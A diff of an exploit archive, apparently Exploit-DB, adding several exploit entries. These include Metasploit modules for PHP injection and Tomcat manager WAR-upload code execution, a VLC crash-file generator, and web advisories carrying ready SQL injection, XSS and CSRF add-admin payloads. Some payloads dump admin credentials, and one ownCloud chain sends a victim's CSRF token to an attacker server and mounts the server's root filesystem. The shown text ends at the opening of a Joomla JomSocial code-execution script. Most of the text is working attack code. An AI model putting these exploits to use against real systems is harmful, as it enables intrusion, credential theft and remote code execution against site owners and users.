return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
uri = normalize_uri(target_uri.path.to_s, "index.php")
send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_get' => { 'pid' => '4' },
'vars_post' =>
{
'cid' => '3',
'name' => "#{rand_text_alphanumeric(10)}\";#{payload.encoded};",
'email' => rand_text_alphanumeric(10),
'subject' => rand_text_alphanumeric(10),
'message' => rand_text_alphanumeric(10),
'action' => 'Send'
}
})
end
end

55
platforms/multiple/dos/31429.py Executable file
View file

@ -0,0 +1,55 @@
#!/usr/bin/python
# VLC Media Player up to 2.1.2 DOS POC Integer Division By zero in ASF Demuxer
# VLC Media Player is prone to DOS utilizing a division by zero error if minimium data packet size
# is equal to zero. this was tested on windows XP sp3 and affects all versions of vlc till latest 2.1.2
# to run this script you need to install python bitstring module
# usage you supply any valid asf and the script will produxe a POC asf that will crash vlc
import sys
from bitstring import BitArray
f = open(sys.argv[1],'r+b')
f.seek(0,2)
size = f.tell()
print "[*] file size: %d" % size
f.seek(0,0)
print "[*] ReeeeeWWWWWWiiiiiNNNNNNND"
fb = BitArray(f)
index = fb.find('0xa1dcab8c47a9cf118ee400c00c205365',bytealigned=True)
print "[*] found file properties GUID"
print "[*] File properties GUID: %s" % fb[index[0]:(index[0]+128)]
# index of minumum packet size in File Proprties header
i_min_data_pkt_size = index[0] + 736
print "[*] Original Minimum Data Packet Size: %s" % fb[i_min_data_pkt_size:i_min_data_pkt_size+32].hex
print "[*] Original Maximum Data Packet Size: %s" % fb[i_min_data_pkt_size+32:i_min_data_pkt_size+64].hex
# Accroding to ASF standarad the minimum data size and the maximum data size should be equal
print "[*] Changing Miniumum and Maximum Data packet size to 0"
# changing the data packets in bit array
fb[i_min_data_pkt_size:i_min_data_pkt_size+8] = 0x00
fb[i_min_data_pkt_size+8:i_min_data_pkt_size+16] = 0x00
fb[i_min_data_pkt_size+16:i_min_data_pkt_size+24] = 0x00
fb[i_min_data_pkt_size+24:i_min_data_pkt_size+32] = 0x00
fb[i_min_data_pkt_size+32:i_min_data_pkt_size+40] = 0x00
fb[i_min_data_pkt_size+40:i_min_data_pkt_size+48] = 0x00
fb[i_min_data_pkt_size+48:i_min_data_pkt_size+56] = 0x00
fb[i_min_data_pkt_size+56:i_min_data_pkt_size+64] = 0x00
print "[*] POC File Created poc.asf"
of = open('poc.asf','w+b')
fb.tofile(of)
of.close()
f.close()

426
platforms/multiple/remote/31433.rb Executable file
View file

@ -0,0 +1,426 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
CSRF_VAR = 'CSRF_NONCE='
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution',
'Description' => %q{
This module can be used to execute a payload on Apache Tomcat servers that
have an exposed "manager" application. The payload is uploaded as a WAR archive
containing a jsp application using a POST request against the /manager/html/upload
component.
NOTE: The compatible payload sets vary based on the selected target. For
example, you must select the Windows target to use native Windows payloads.
},
'Author' => 'rangercha',
'License' => MSF_LICENSE,
'References' =>
[
# This is based on jduck's tomcat_mgr_deploy.
# the tomcat_mgr_deploy o longer works for current versions of tomcat due to
# CSRF protection tokens. Also PUT requests against the /manager/html/deploy
# aren't allowed anymore.
# There is no single vulnerability associated with deployment functionality.
# Instead, the focus has been on insecure/blank/hardcoded default passwords.
# The following references refer to HP Operations Manager
['CVE', '2009-3843'],
['OSVDB', '60317'],
['CVE', '2009-4189'],
['OSVDB', '60670'],
# HP Operations Dashboard
['CVE', '2009-4188'],
# IBM Cognos Express Default user/pass
['BID', '38084'],
['CVE', '2010-0557'],
['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'],
# IBM Rational Quality Manager and Test Lab Manager
['CVE', '2010-4094'],
['ZDI', '10-214'],
# 'admin' password is blank in default Windows installer
['CVE', '2009-3548'],
['OSVDB', '60176'],
['BID', '36954'],
# tomcat docs
['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html']
],
'Platform' => %w{ java linux win }, # others?
'Targets' =>
[
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
}
],
#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'Linux x86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 09 2009'))
register_options(
[
OptString.new('USERNAME', [false, 'The username to authenticate as']),
OptString.new('PASSWORD', [false, 'The password for the specified username']),
# /cognos_express/manager/ for Cognos Express (19300)
OptString.new('TARGETURI', [true, "The URI path of the manager app (/html/upload and /undeploy will be used)", '/manager'])
], self.class)
end
def check
res = query_manager
disconnect
return CheckCode::Unknown if res.nil?
if res.code.between?(400, 499)
vprint_error("#{peer} - Server rejected the credentials")
return CheckCode::Unknown
end
return CheckCode::Safe unless res.code == 200
# if res.code == 200
# there should be access to the Tomcat Manager and to the status page
res = query_status
return CheckCode::Unknown unless res
plat = detect_platform(res.body)
arch = detect_arch(res.body)
return CheckCode::Unknown unless plat and arch
vprint_status("#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture")
report_auth_info(
:host => rhost,
:port => rport,
:sname => (ssl ? "https" : "http"),
:user => datastore['USERNAME'],
:pass => datastore['PASSWORD'],
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
:active => true
)
return CheckCode::Appears
end
def exploit
@app_base = rand_text_alphanumeric(4 + rand(32 - 4))
@jsp_name = rand_text_alphanumeric(4 + rand(32 - 4))
#
# Find the session ID and the CSRF token
#
print_status("#{peer} - Retrieving session ID and CSRF token...")
unless access_manager?
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
end
#
# Upload Payload
#
print_status("#{peer} - Uploading and deploying #{@app_base}...")
if upload_payload
report_auth_info(
:host => rhost,
:port => rport,
:sname => (ssl ? "https" : "http"),
:user => datastore['USERNAME'],
:pass => datastore['PASSWORD'],
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
:active => true
)
else
fail_with(Failure::Unknown, "Upload failed")
end
#
# Execute Payload
#
print_status("#{peer} - Executing #{@app_base}...")
unless execute_payload
fail_with(Failure::Unknown, "Failed to execute the payload")
end
#
# Get the new CSRF token & session id
#
unless access_manager?
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
end
#
# Delete the deployed payload
#
print_status("#{peer} - Undeploying #{@app_base} ...")
unless undeploy_app
print_warning("#{peer} - Failed to undeploy #{@app_base}...")
end
end
def query_status
path = normalize_uri(target_uri.path.to_s, 'status')
res = send_request_raw('uri' => path)
unless res and res.code == 200
vprint_error("Failed: Error requesting #{path}")
return nil
end
return res
end
def query_manager
path = normalize_uri(target_uri.path.to_s, '/html')
res = send_request_raw('uri' => path)
return res
end
def vars_get
vars = {}
unless @csrf_token.nil?
vars = {
"path" => @app_base,
"org.apache.catalina.filters.CSRF_NONCE" => @csrf_token
}
end
return vars
end
def detect_platform(body)
return nil if body.blank?
i=0
body.each_line do |ln|
ln.chomp!
i = 1 if ln =~ /OS Name/
if i == 9 or i == 11
if ln.include? "Windows"
return 'win'
elsif ln.include? "Linux"
return 'linux'
elsif i==11
return 'unknown'
end
end
i = i+1 if i > 0
end
end
def detect_arch(body)
return nil if body.blank?
i=0
body.each_line do |ln|
ln.chomp!
i = 1 if ln =~ /OS Architecture/
if i==9 or i==11
if ln.include? 'x86'
return ARCH_X86
elsif ln.include? 'i386'
return ARCH_X86
elsif ln.include? 'i686'
return ARCH_X86
elsif ln.include? 'x86_64'
return ARCH_X86
elsif ln.include? 'amd64'
return ARCH_X86
elsif i==11
return 'unknown'
end
end
i = i + 1 if i > 0
end
end
def find_csrf(res = nil)
return "" if res.blank?
vprint_status("#{peer} - Finding CSRF token...")
body = res.body
body.each_line do |ln|
ln.chomp!
csrf_nonce = ln.index(CSRF_VAR)
next if csrf_nonce.nil?
token = ln[csrf_nonce + CSRF_VAR.length, 32]
return token
end
return ""
end
def generate_multipart_msg(boundary, data)
# Rex::MIME::Message is breaking the binary upload when trying to
# enforce CRLF for SMTP compatibility
war_multipart = "-----------------------------"
war_multipart << boundary
war_multipart << "\r\nContent-Disposition: form-data; name=\"deployWar\"; filename=\""
war_multipart << @app_base
war_multipart << ".war\"\r\nContent-Type: application/octet-stream\r\n\r\n"
war_multipart << data
war_multipart << "\r\n-----------------------------"
war_multipart << boundary
war_multipart << "--\r\n"
end
def war_payload
payload.encoded_war({
:app_name => @app_base,
:jsp_name => @jsp_name,
:arch => target.arch,
:platform => target.platform
}).to_s
end
def send_war_payload(url, war)
boundary_identifier = rand_text_numeric(28)
res = send_request_cgi({
'uri' => url,
'method' => 'POST',
'ctype' => 'multipart/form-data; boundary=---------------------------' + boundary_identifier,
'user' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'cookie' => @session_id,
'vars_get' => vars_get,
'data' => generate_multipart_msg(boundary_identifier, war),
})
return res
end
def send_request_undeploy(url)
res = send_request_cgi({
'uri' => url,
'vars_get' => vars_get,
'method' => 'POST',
'user' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'cookie' => @session_id
})
return res
end
def access_manager?
res = query_manager
return false unless res and res.code == 200
@session_id = res.get_cookies
@csrf_token = find_csrf(res)
return true
end
def upload_payload
war = war_payload
upload_path = normalize_uri(target_uri.path.to_s, "html", "upload")
vprint_status("#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...")
res = send_war_payload(upload_path, war)
return parse_upload_response(res)
end
def parse_upload_response(res)
unless res
vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]")
return false
end
if res.code < 200 or res.code >= 300
vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]")
return false
end
return true
end
def execute_payload
jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp")
vprint_status("#{peer} - Executing #{jsp_path}...")
res = send_request_cgi({
'uri' => jsp_path,
'method' => 'GET'
})
return parse_execute_response(res)
end
def parse_execute_response(res)
unless res
vprint_error("#{peer} - Execution failed on #{@app_base} [No Response]")
return false
end
if res and (res.code < 200 or res.code >= 300)
vprint_error("#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]")
return false
end
return true
end
def undeploy_app
undeploy_url = normalize_uri(target_uri.path.to_s, "html", "undeploy")
res = send_request_undeploy(undeploy_url)
unless res
vprint_warning("#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]")
return false
end
if res and (res.code < 200 or res.code >= 300)
vprint_warning("#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]")
return false
end
return true
end
end

9
platforms/php/webapps/31414.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28291/info
The 'phpstats' program is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects phpstats 0.1_alpha.
http://www.example.com/phpstats/phpstats.php?baseDir=<script>alert(1)</script>&mode=run

11
platforms/php/webapps/31415.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/28293/info
eForum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
These issues affect eForum 0.4; other versions may also be affected.
http://www.example.com/eForum/busca.php
http://www.example.com/eForum/busca.php?link=%3Cscript%3Ealert(1)%3C/script%3E&busca=%3Cscript%3Ealert(2)%3C/script%3E
http://www.example.com/eForum/busca.php?link=%3Cscript%3Ealert(1)%3C/script%3E

9
platforms/php/webapps/31416.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28294/info
webSPELL is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
webSPELL 4.01.02 is vulnerable; other versions may also be affected.
http://www.example.com/path/index.php?site=forum&board=">[XSS]

91
platforms/php/webapps/31418.txt Executable file
View file

@ -0,0 +1,91 @@
Jobsite logo - Multiple Vulnerabilties
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://sourceforge.net/projects/jobfinder/
####################################################################
VULNERABILITY
##############
/includes/reg.php (line 4-28)
$user=addslashes($_POST['user']);
$pass=addslashes($_POST['user_password']);
$email=$_POST['email'];
$pass2=addslashes($_POST['user_password2']);
$firstname=addslashes($_POST['firstname']);
$lastname=addslashes($_POST['lastname']);
$middlename=addslashes($_POST['middlename']);
$title=addslashes($_POST['title']);
$address=addslashes($_POST['address']);
$city=addslashes($_POST['city']);
if(isset($user) && isset($pass))
{
$email=addslashes($email);
if($pass2!=$pass)
{
echo "<script type='text/javascript'>javascript:alert('Passwords
doesnt match.');</script>";
exit;
}
$connection = new db();
$connection->connect();
$result = mysql_query("SELECT username FROM mobagi_".$title." WHERE
username='".$user."' ")or die (mysql_error());
#########
EXPLOIT
#########
[1] Post Sql Injection
======================
Note: enter the registration page[register.php] and register there , then
take the post code
POST /jobs/includes/reg.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jobs/register.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
title=[SQL
INJECTION]&firstname=&middlename=&lastname=&address=&city=&user=&user_password=&user_password2=&email=&Submit=Register
[2] Post Cross Site Scripting
===============================
POST /jobs/includes/reg.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jobs/register.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
title=<script>alert(document.cookie);</script>&firstname=&middlename=&lastname=&address=&city=&user=&user_password=&user_password2=&email=&Submit=Register
####################################################################

66
platforms/php/webapps/31419.txt Executable file
View file

@ -0,0 +1,66 @@
TopicsViewer v3.0 Beta 1 - Multiple Sql Injection Vulnerabilty
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.topicsviewer.com/
####################################################################
Multiple Sql Injection
======================
VULNERABILITY
##############
[I] /admincp/edit_block.php (line 46-48)
$sql_b_e = "select * from blocks where b_id = $_GET[id] ";
$result_b_e = @mysql_query ($sql_b_e);
$block = @mysql_fetch_array ($result_b_e);
#########
EXPLOIT
#########
localhost/Path/admincp/edit_block.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8,9,10
VULNERABILITY
##############
[II] /admincp/edit_cat.php (line 77-79)
$sql = "select * from cat where c_id = $_GET[id]";
$result = @mysql_query ($sql);
$cat= @mysql_fetch_array ($result);
#########
EXPLOIT
#########
localhost/Path/admincp/edit_cat.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8
VULNERABILITY
##############
[III] /admincp/edit_note.php (line 77-79)
$sql = "select * from cat where c_id = $_GET[id]";
$result = @mysql_query ($sql);
$cat= @mysql_fetch_array ($result);
#########
EXPLOIT
#########
localhost/Path/admincp/edit_note.php?id=1+and+1=2+union+select+1,version(),3,4,5
VULNERABILITY
##############
[V] /admincp/rmv_topic.php (line 46-47)
$sql = "select * from topics where t_id = $_GET[id] LIMIT 1 ;";
$result = @mysql_query ($sql);
#########
EXPLOIT
#########
localhost/Path/admincp/rmv_topic.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14
####################################################################

53
platforms/php/webapps/31420.txt Executable file
View file

@ -0,0 +1,53 @@
Eventy Online Scheduler V1.8 - Multiple Vulnerabilties
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script :
http://calendarscripts.info/event-calendar-software.html
.:. Dork : "Powered by CalendarScripts.info"
####################################################################
[1] Sql Injection
==================
VULNERABILITY
##############
/eve_event.php (line 15-16)
$query="SELECT * FROM $T_EVENTS WHERE id=".$_GET['id'];
$event=$DB->sq($query);
#########
EXPLOIT
#########
http://site/eve_event.php?id=null+and+1=2+union+select+1,group_concat(id,0x3a,username,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+evp_admin
[2] Cross Site Scripting
=========================
http://site/eventy.php?next=1&selmonth=January&selyear=2014'"()%26%25<ScRiPt
>prompt(document.cookie)</ScRiPt>
[3] Cross Site Request Forgery
==============================
[Add Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/a_admins.php">
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="pass" value="admin"/>
<input type="hidden" name="add" value="1"/>
</form>
</body>
</html>
####################################################################

50
platforms/php/webapps/31421.txt Executable file
View file

@ -0,0 +1,50 @@
Booking Calendar PHP - Multiple Vulnerabilties
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.sajt-trgovina.com/booking_calendar/
####################################################################
[1] Multiple Sql Injection
===========================
http://site/calendare/get_code.php?id=null'+and+1=2+union+select+1,2,version(),4,5,6---
http://site/calendare/read_answer.php?id=null+and+1=2+union+select+1,2,3,4,5,6,version(),8,9,10
http://site/calendare/edit_calendar.php?id=null'+and+1=2+union+select+1,version(),3,4,5,6---
[2] Cross Site Scripting
=========================
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/calendare/">
<input type="hidden" name="id_template" value="2"/>
<input type="hidden" name="name"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="save_new_calendar" value="Save new calendar"/>
</form>
</body>
</html>
[3] Cross Site Request Forgery
==============================
[Add Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/calendare/user_add.php
">
<input type="hidden" name="name" value="iphobos"/>
<input type="hidden" name="email" value="email@hotmail.com"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="user_add" value="Save changes"/>
</form>
</body>
</html>
####################################################################

61
platforms/php/webapps/31426.txt Executable file
View file

@ -0,0 +1,61 @@
# Exploit Title: Multiply vulnerabilites in plogger 1.0 (RC1)
# Date: 03/02/2014
# Exploit Author: killall-9@mail.com
# Vendor Homepage: http://www.plogger.org/
# Software Link: http://www.plogger.org/download/
# Version: 1.0 (RC1)
# Tested on: Virtualbox (debian) and Apache
REFLECTED XSS:
1) http://localhost/plogger-1.0RC1/?jump-menu=%22%20onmouseover%3dprompt%281337%29%20bad%3d%22
2) http://localhost/plogger-1.0RC1/plog-admin/index.php?loginerror&r=%22%20onmouseover%3dprompt%281337%29%20bad%3d%22
------------------------------------------------------
STORED XSS: (must be logged in)
1)
POST /plogger-1.0RC1/plog-admin/plog-manage.php?level=albums&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/plogger-1.0RC1/plog-admin/plog-manage.php?action=edit-album&id=1
Cookie: PHPSESSID=sjjl1sqlt8ceuo5upt6p9jfsf1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
name=Plogger%2BTest%2BAlbum&description=%3Cscript%3Ealert%28%22css+here%22%29%3B%3C%2Fscript%3E&thumbnail_id=4&pid=1&action=update-album&update=Update
(In the description field it's possible to store javascript code)
------------------------------------------------------
CSRF:
1)
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html lang="en">
<head>
<title>Pinata-CSRF-Tool</title>
</head>
<body>
<form action="http://localhost/plogger-1.0RC1/plog-admin/plog-manage.php?level=albums&id=1" id="formid" method="post">
<input name="name" value="Plogger+Test+Album" />
<input name="description" value="Feel+free+to+ownz+it+" />
<input name="thumbnail_id" value="0" />
<input name="pid" value="1" />
<input name="action" value="update-album" />
<input name="update" value="Update" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
chherZ.

131
platforms/php/webapps/31427.txt Executable file
View file

@ -0,0 +1,131 @@
# Exploit Title: ownCloud 6.0.0a File Deletion XSS and CSRF Protection Bypass
# Vendor Homepage: www.ownCloud.org
# OwnCloud Version: 6.0.0a
# Browsers tested: Iceweasel 22.0; Internet Explorer 11;
# Server: Debian. Default LAMP set-up.
# Exploit Author: James Sibley (absane)
# Blog: http://blog.noobroot.com
# Discovery date: December 12th, 2013
# Vendor notified: December 12th, 2013
# Vendor fixed: January 22th, 2014
# CVE assignment: CVE-2014-1665
A malicious ownCloud user can upload a file with JavaScript code in the filename, share it, and
cause a XSS attack when the victim tries to either view the contents of the file or delete the
file.
If the victim is an ownCloud administrator, an attacker can force the mounting of the webserver's
local file system, leading to unauthorized access to server resources and potentially shell
access.
=======================
=Proof of Concept.....=
=======================
1) Create a file named <img src=x onerror=alert(0);>.txt (on a Linux machine)
2) Upload it to OwnCloud by clicking on the Upload button (up arrow next to "new") on the Web UI.
3) Share the file with the victim.
4) When the victim sees the shared file in their "Shared" directory, they can:
a) View the contents of the file within OwnCloud, or
b) become suspicious of the file and attempt to delete it.
Both a) and b) options will result in Javascript being executed in the victim's web browser.
=======================
=Exploit..............=
=======================
** **
** NOTE: Replace [ATTACKER'S WEBSERVER] with the attacker's domain/IP. **
** NOTE: Replace [ATTACKER] with the attacker's account on ownCloud. **
** **
** Filename (share a malicious file with this name):
<img src=x onerror="var z=document.getElementsByTagName('head')[0].getAttribute('data-requesttoken');
document.location='http://[ATTACKER'S WEBSERVER]/ownCloudhack.php?rt='+z";>
** Code (ownCloudhack.php):
<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>OwnCloud 6.0.0a XSS and CSRF Protection Bypass</title>
<script type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<span id="container"></span>
<form id="form1">
<input type="hidden" name="mountPoint" value="LOL">
<input type="hidden" name="class" value="\OC\Files\Storage\Local">
<input type="hidden" name="classOptions[datadir]" value="/">
<input type="hidden" name="mountType" value="user">
<input type="hidden" name="applicable" value="[ATTACKER]">
<input type="hidden" name="isPersonal" value="false">
<?php echo '<input type="hidden" name="requesttoken" value="'.$_GET["rt"].'">' ?>
</form>
<script>
$('#form1').submit(function(event) {
event.preventDefault();
$.ajax({
type: 'POST',
url: 'http://[ATTACKER'S WEBSERVER]/index.php/apps/files_external/ajax/addMountPoint.php',
data: $(this).serialize(),
xhrFields: {
withCredentials: true
},
dataType: 'json',
}
});
});
</script>
<form id="form2">
<input type="hidden" name="appid" value="files_external">
<?php echo '<input type="hidden" name="requesttoken" value="'.$_GET["rt"].'">' ?>
</form>
<script>
$('#form2').submit(function(event) {
event.preventDefault();
$.ajax({
type: 'POST',
url: 'http://[ATTACKER'S WEBSERVER]/index.php/settings/ajax/enableapp.php',
data: $(this).serialize(),
xhrFields: {
withCredentials: true
},
dataType: 'json',
});
});
function ext() {
$('#form2').submit();
$("#container").text("Enabling External Storage...");
};
function mount() {
$('#form1').submit();
$("#container").text("Mounting the root filesystem...");
};
function redirect() {
window.location.href = 'http://[ATTACKER'S WEBSERVER]/';
$("#container").text("Redirecting back home ;)");
};
setTimeout(function() {ext();}, 0);
setTimeout(function() {mount();}, 5000);
setTimeout(function() {redirect();}, 5500);
</script>
</body>
</html>
=======================
=Mitigation...........=
=======================
Upgrade to ownCloud 6.0.1 or greater.
If upgrading is not an option, then the file can be removed by either
1) manually removing the file from the disk via command line interface, or
2) first renaming the file to something else and then deleting the file.

88
platforms/php/webapps/31431.txt Executable file
View file

@ -0,0 +1,88 @@
I have discovered two vulnerabilities in ImpressCMS. These have been
fixed in the new 1.3.6 version, which you can get at
https://sourceforge.net/projects/impresscms/files/ImpressCMS%20Official%20Releases/ImpressCMS%201.3%20Branch/ImpressCMS%201.3.6/.
One is an arbitrary file deletion and the other is two cross site
scripting issues.
Note that I was unable to exploit the XSS issues due to the inbuilt
protection module, but someone smarter / with more time might be able
to do it.
The tickets containing the information are available here
https://www.assembla.com/spaces/dW4voyNP0r4ldbeJe5cbLr/tickets?report%5Bestimate_show%5D=true&report%5Bid%5D=0&report%5Bmilestone_id_cond%5D=1&report%5Bmilestone_id_val%5D=4129593&report%5Btitle%5D=All+Tickets+for+%27ImpressCMS+1.3.6%27&report%5Btotal_estimate_show%5D=true&report%5Btotal_invested_hours_show%5D=true&report%5Bworking_hours_show%5D=true.
The full report can be seen at my repo
https://github.com/pedrib/PoC/blob/master/impresscms-1.3.5.txt
Thanks in advance, and thanks to the ImpressCMS team for being so responsive.
Regards,
Pedro Ribeiro
Agile Information Security
--------
Proof of concept:
ImpressCMS 1.3.5 vulnerabilities
===================================
Discovered by
Pedro Ribeiro (pedrib@gmail.com) of Agile Information Security
========================================
Vulnerability: Deletion of arbitrary files in the system
File(line): /impresscms/htdocs/libraries/image-editor/image-edit.php(62)
Code snippet:
if (! is_null ( $op ) && $op == 'cancel') {
$image_path = isset ( $_GET ['image_path'] ) ? $_GET ['image_path'] : null;
if (file_exists ( $image_path )) {
@unlink ( $image_path );
}
Proof of concept:
<form name="input" action="http://192.168.56.101/impresscms/htdocs/libraries/image-editor/image-edit.php?op=cancel&image_path=/path/to/any/file" method="post">
<input type="submit" value="Submit">
</form>
========================================
Vulnerability: Cross site scripting (XSS)
File(line): /impresscms/htdocs/misc.php(110)
Code snippet:
<h4><?php echo _MSC_AVAVATARS;?></h4>
<form name='avatars' action='<?php echo $_SERVER['REQUEST_URI'];?>'>
<table width='100%'>
Proof of concept:
https://192.168.56.101/impresscms/htdocs/misc.php?action=showpopups&type=avatars&target='>PAYLOAD
NOTE: wasn't able to exploit with Protector on, but someone smarter might be able to do it.
========================================
Vulnerability: Cross site scripting (XSS)
File(line): /impresscms/modules/system/admin/tplsets/main.php(171)
Code snippet:
case 'listtpl':
$tplset = trim($_GET['tplset']);
if ($tplset == '') {
redirect_header('admin.php?fct=tplsets', 1);
}
if ($moddir == '') {
redirect_header('admin.php?fct=tplsets', 1);
}
icms_cp_header();
$module_handler = icms::handler('icms_module');
$module =& $module_handler->getByDirname($moddir);
$modname = $module->getVar('name');
echo '<div class="CPbigTitle" style="background-image: url('
. ICMS_MODULES_URL . '/system/admin/tplsets/images/tplsets_big.png)">'
. '<a href="admin.php?fct=tplsets">'. _MD_TPLMAIN
.'</a>&nbsp;<span style="font-weight:bold;">&raquo;&raquo;</span>&nbsp;'
. $tplset . '&nbsp;<span style="font-weight:bold;">&raquo;&raquo;</span>&nbsp;'
. $modname . '<br /><br /></div><br />';
Proof of concept:
https://192.168.56.101/impresscms/htdocs/modules/system/admin.php?fct=tplsets&op=listtpl&tplset=aaaa">PAYLOAD&moddir=banners
NOTE: wasn't able to exploit with Protector on, but someone smarter might be able to do it.

164
platforms/php/webapps/31435.py Executable file
View file

@ -0,0 +1,164 @@
#!/usr/bin/python
#
# Joomla! JomSocial component >= 2.6 PHP code execution exploit
#
# Authors:
# - Matias Fontanini
# - Gaston Traberg
#
# This exploit allows the execution of PHP code without any prior
# authentication on the Joomla! JomSocial component.
#
# Note that in order to be able to execute PHP code, both the "eval"
# and "assert" functions must be enabled. It is also possible to execute
# arbitrary PHP functions, without using them. Therefore, it is possible
# to execute shell commands using "system", "passthru", etc, as long
# as they are enabled.
#
# Examples:
#
# Execute PHP code:
# ./exploit.py -u http://example.com/index.php -p "echo 'Hello World!';"
# ./exploit.py -u http://example.com/index.php -p /tmp/script_to_execute.php
#
# Execute shell commands(using system()):
# ./exploit.py -u http://example.com/index.php -s "netstat -n"
#
# Exploit shell commands(using a user provided function, passthru in this case)
# ./exploit.py -u http://example.com/joomla/index.php -s "netstat -natp" -c passthru
#
# Exploit execution example:
# $ python exploit.py -u http://example.com/index.php -p 'var_dump("Hello World!");'
# [i] Retrieving cookies and anti-CSRF token... Done
# [+] Executing PHP code...
# string(12) "Hello World!"
import urllib, urllib2, re, argparse, sys, os
class Exploit:
token_request_data = 'option=com_community&view=frontpage'
